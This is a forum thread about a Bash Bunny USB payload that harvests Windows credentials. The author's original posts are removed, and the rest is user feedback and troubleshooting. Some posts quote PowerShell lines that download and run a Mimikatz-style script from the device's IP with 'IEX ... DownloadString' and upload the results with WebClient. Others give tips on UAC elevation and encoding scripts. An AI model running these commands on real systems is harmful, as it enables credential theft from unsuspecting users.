illwill Posted March 24, 2017 Share Posted March 24, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC 4 Quote Link to comment Share on other sites More sharing options...
SixthOfGod Posted March 24, 2017 Share Posted March 24, 2017 When I run it, it's stalling out at the " WebServer started and Uploading Results" stage. Initially I thought it might be because I run as a full-time vpn client, and that was messing up the routes. But, I disabled the VPN, and it's still stalling out. I'll try to step through the attack manually, and see where it's breaking down. 1 Quote Link to comment Share on other sites More sharing options...
oXis Posted March 24, 2017 Share Posted March 24, 2017 (edited) This is wicked man Edited March 24, 2017 by oXis Quote Link to comment Share on other sites More sharing options...
wmrabb Posted March 24, 2017 Share Posted March 24, 2017 This is awesome, Just tested on my Windows 7 Virtual Machine and it snagged the plaintext password in about 15 seconds. Great job! Quote Link to comment Share on other sites More sharing options...
azzarin Posted March 26, 2017 Share Posted March 26, 2017 (edited) So far this just wiped everything in the loot folder. Tested on Windows 10. Going to do some more tests. Getting this, might be the problem: C:\WINDOWS\system32>powershell -c \"while \(\$true\) \{ If \(Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit\"\}\} At line:1 char:91 + ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\} + ~ Unexpected token '\' in expression or statement. At line:1 char:92 + ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\} + ~ Unexpected token '}' in expression or statement. At line:1 char:94 + ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\} + ~ Unexpected token '}' in expression or statement. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : UnexpectedToken Edited March 26, 2017 by azzarin Quote Link to comment Share on other sites More sharing options...
illwill Posted March 26, 2017 Author Share Posted March 26, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
korang Posted March 27, 2017 Share Posted March 27, 2017 (edited) So when I try to run this on a laptop with certain policies in the place, the CMD command asks for credentials to load when then causes the whole script to fail after that point as command prompt does not get executed. SO I think that bypassing UAC in this method is not working, in my situation. Edited March 27, 2017 by korang Quote Link to comment Share on other sites More sharing options...
azzarin Posted March 27, 2017 Share Posted March 27, 2017 (edited) 17 hours ago, illwill said: you cant copy the code directly and paste it into a cmd prompt because theres backslashes that are escaping special characters.... I just made it pause for longer. I did not copy it. i ll try again. Have you tried on Windows 10 ? It might have to do with the language. When it types the line in "cmd" i can see special charecter. and it looks the same as i posted before. Tried on 2 PCs with Windows 10. And thanks for making this. Edited March 27, 2017 by azzarin Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted March 27, 2017 Share Posted March 27, 2017 I was reading through the script and noticed in some instances what korang says happens. I found out in my travels with the Rubber Ducky not all windows have GUI r set to open run. Only particular machine (SHIFT-CTRL-ENTER) does not run something as admin. Have not looked into why. I just got the BB last week, seen this script and see some improvements that can be made. My first project to get acclimated with the BB is to do a rewrite of this in a way that will work on all WIndows 7 and up boxes. This is not anyway a diss of what is currently there. I just have ideas to improve it more. Also, want to do wat BunnyTap does and use a Node server instead of Python. I love Python, I use it alot. Just trying other things. "Discovery is done through experimentation"..Dr. Whitehall (Marvel) Secret I use for admin is instead of using cmd by itself, I use powershell to run it and get the same prompting result as the CTRL-SHIFT-ENTER would do. powershell -c "Start-Process cmd -verb runas" Now i don't have to worry about those shortcut keys not working. Also for the yes command after the prompt an ALT-Y works best for selecting it. Also also found myself building my own agents to fire off a UAC bypass script that will launch my actual script. I did this a few times for fun but takes up another 5-10 seconds at the terminal to complete so not practical in a time crunch. Lastly, I see a lot of clear text scripts in Powershell. I always reduce and then encode my Powershell scripts. Help to avoid having to escape character stuff since Base64 is universal. I am going to post some of my tricks from Powershell Empire, Powersploit and Rubber Ducky experiences with Powershell that can be translated to the BB here shortly today. Quote Link to comment Share on other sites More sharing options...
azzarin Posted March 27, 2017 Share Posted March 27, 2017 57 minutes ago, PoSHMagiC0de said: I was reading through the script and noticed in some instances what korang says happens. I found out in my travels with the Rubber Ducky not all windows have GUI r set to open run. Only particular machine (SHIFT-CTRL-ENTER) does not run something as admin. Have not looked into why. I just got the BB last week, seen this script and see some improvements that can be made. My first project to get acclimated with the BB is to do a rewrite of this in a way that will work on all WIndows 7 and up boxes. This is not anyway a diss of what is currently there. I just have ideas to improve it more. Also, want to do wat BunnyTap does and use a Node server instead of Python. I love Python, I use it alot. Just trying other things. "Discovery is done through experimentation"..Dr. Whitehall (Marvel) Secret I use for admin is instead of using cmd by itself, I use powershell to run it and get the same prompting result as the CTRL-SHIFT-ENTER would do. powershell -c "Start-Process cmd -verb runas" Now i don't have to worry about those shortcut keys not working. Also for the yes command after the prompt an ALT-Y works best for selecting it. Also also found myself building my own agents to fire off a UAC bypass script that will launch my actual script. I did this a few times for fun but takes up another 5-10 seconds at the terminal to complete so not practical in a time crunch. Lastly, I see a lot of clear text scripts in Powershell. I always reduce and then encode my Powershell scripts. Help to avoid having to escape character stuff since Base64 is universal. I am going to post some of my tricks from Powershell Empire, Powersploit and Rubber Ducky experiences with Powershell that can be translated to the BB here shortly today. Looking forward to see what you bring to the table. Quote Link to comment Share on other sites More sharing options...
azzarin Posted March 27, 2017 Share Posted March 27, 2017 1 hour ago, azzarin said: I just made it pause for longer. I did not copy it. i ll try again. Have you tried on Windows 10 ? It might have to do with the language. When it types the line in "cmd" i can see special charecter. and it looks the same as i posted before. Tried on 2 PCs with Windows 10. And thanks for making this. Changed to English keyboard, it helped a bit, but does not connect back to the bashbunny. Fails to connect. Quote Link to comment Share on other sites More sharing options...
Skiddie Posted March 27, 2017 Share Posted March 27, 2017 Definitely one of the best ones yet, great job! Quote Link to comment Share on other sites More sharing options...
illwill Posted March 28, 2017 Author Share Posted March 28, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
hexa Posted March 28, 2017 Share Posted March 28, 2017 First off all, Thanks for the great payload, Secondly, unfortenately at first it didn't work, So after putting a pause in the payload I could see why it didn't work. The powershell command creates a typo (i quess it has to do with the keyboard layout),look at the end where the name of the file creates ÉOF instead of 'EOF' part of the output: ew-Object Net.WebClient).UploadString('http://172.16.64.1/EOF',ÉOF'); So I solved the problem by changing all the file names EOF into DOF. That way the payload creates a file 'DOF' and works create. Also change the name In the file server.py ( EOF in DOF), change it in whatever you like but avoid the letter E and A sinds É also exists I would suggest to change it in the original payload? Since more people use a US keyboardlayout. Anyway Thanks for the payload and keep up the good work! Quote Link to comment Share on other sites More sharing options...
qdba Posted March 28, 2017 Share Posted March 28, 2017 Good Work, I had the same idea because I'm pentesting a company who had forbidden USB Storage and Internet access per Policy. They have a good firewall with contenfilter and only a few Internet pages will be allowed. So you saved me a lot of time coding the stuff... Thank you .... One idea... .... the whole QUACK stuff takes a lot of time. To save attack time put a lot of the QUACK code into the powershellcode. I had done it with your CredDump Payload. https://github.com/qdba/bashbunny-payloads/tree/master/payloads/DumpCreds Only a suggestion. You do a really good work anyway. Quote Link to comment Share on other sites More sharing options...
illwill Posted March 29, 2017 Author Share Posted March 29, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC 1 Quote Link to comment Share on other sites More sharing options...
yeahits_ZP83 Posted April 8, 2017 Share Posted April 8, 2017 My new fav! Nice work. Quote Link to comment Share on other sites More sharing options...
MetateM Posted May 23, 2017 Share Posted May 23, 2017 Anyone having luck with this payload? have 1.1 working and i'm having same problems as others. Payload executes but only creates an empty loot folder with nothing in it. Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted May 23, 2017 Share Posted May 23, 2017 I haven't testing IWill's payload since he built it. I just seen he built it and looked cool from a code point of view. I know he had timing issues in the beginning. Best way is to test. To test, in his payload.txt, edit it and remove the hidden parameter. This will make everything it does visible. See if any red errors go flying across the screen. You can edit the first line of ps1 also, for testing only, to see if mimi is even running and sending output. At the bottom will be the example of using tee-object to put output in a variable and display it to console so you see the output on the windows machine and still capture it in the "o" variable. I have not gave his payload a go yet directly to see the interaction. I like his python server and the kill command he sends at the end to close it out rather than leave it running in the background all day. IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');Invoke-Mimidogz -DumpCred | tee-object -Variable o Quote Link to comment Share on other sites More sharing options...
illwill Posted May 29, 2017 Author Share Posted May 29, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted May 30, 2017 Share Posted May 30, 2017 Info on this module and similar ones. If you are trying to run Mimi-whatever on a fully updated Windows 10 machine or even powerdump, good luck. It has been hardened against these. Avast is even able to sniff execution in Win 10 so it will detect mimikatz but not dogz but dogz will get nothing still. Powerdump will throw an illegal ptr operation. Exploitation frameworks are having the same issue. Windows 7 seems to not have this issue. Avast will detect the exploitation framework too, freeze the operation of it coming up and inform the user of something funny going on and if they want to ignore or kill the process. The challenge is now on. So, on Windows 10 MS is making it tougher to steal creds in memory. Windows 7 shouldn't have no concern. Of course Win 10 people have to worry about MS spying on them with the Creator Update. 1 Quote Link to comment Share on other sites More sharing options...
HeadScratchCode Posted June 5, 2017 Share Posted June 5, 2017 This is one of the best payloads. Even if you can't snag the plain text (windows 10) you still get the password hashes. If you can't get it working. just add a few more DELAYs. As, I'm in China, I have to add Q SHIFT once it opens the terminal. This is because many systems use a pinyin input method that switches back and forth from English to Chinese by pressing SHIFT. If I don't, the terminal will fill up with Chinese characters. Great payload dude! Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted June 5, 2017 Share Posted June 5, 2017 On my updated WIn10 Pro machine and image it fails. The injects that some payloads need to do are not allowed anymore, even with PS2.0 enabled. Update the Win10 machine to the latest updates and you may see the same. If it is Win10 Home, I then do not know how it will work. I noticed any exploit framework I have the process injects are failing now on Win10. Quote Link to comment Share on other sites More sharing options...
b0N3z Posted June 5, 2017 Share Posted June 5, 2017 I tried to mess around with mimikatz on win 10 and it denied me every time no matter what directory I used or even as an admin. Quote Link to comment Share on other sites More sharing options...
KenPC Posted June 23, 2017 Share Posted June 23, 2017 (edited) Sorry for a stupid question, but where to put the md.ps1, server.py and p.ps1 to get this to work? root of the bashbunny filesystem or in the USB storage FS? Edit: after looking at the payload .txt, I noticed it's calling it in $switchdir. I got it now. EDIT2: anyone having issues with it waiting for the websever, but it's up and hosting p.ps1. When I manually run it, the BB goes green. Otherwise it just sits flashing blue forever. Running on Windows7pro base install fully up to date. I'm no ps pro otherwise i'd debug myself :/ I'm more of a Physical Penetration-ist myself. Just dabbled in some coding. Edited June 24, 2017 by KenPC Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.